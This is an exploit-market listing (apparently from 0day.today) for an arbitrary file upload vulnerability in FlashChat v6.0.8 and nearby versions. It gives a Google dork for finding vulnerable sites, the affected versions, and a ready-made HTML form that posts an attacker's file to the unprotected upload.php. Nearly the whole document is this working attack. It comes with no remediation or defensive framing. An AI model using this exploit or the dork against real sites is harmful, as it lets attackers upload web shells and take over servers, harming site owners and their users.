[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FlashChat - Arbitrary File Upload Vulnerability

Author
x-hayben21
Risk
[
Security Risk High
]
0day-ID
0day-ID-21334
Category
web applications
Date add
04-10-2013
Platform
php
#######################################################
# Exploit Title: FlashChat File Upload Vulnerability
# Google Dork: intitle:FlashChat v6.0.8
# Date: 02.10.2013
# Exploit Author: x-hayben21
# Vendor Homepage: www.punish3r.com
# Software Link: http://www.tufat.com/script2.htm
# Version: v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7,
# Tested on: Windows, PHP 5.2
#
# Special Thanks : MaXtoR - PoLoNia
#######################################################
 
#Vulnerable File : upload.php
 
#Exploit
<form action="http://sites/script/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>

#  0day.today [2024-10-06]  #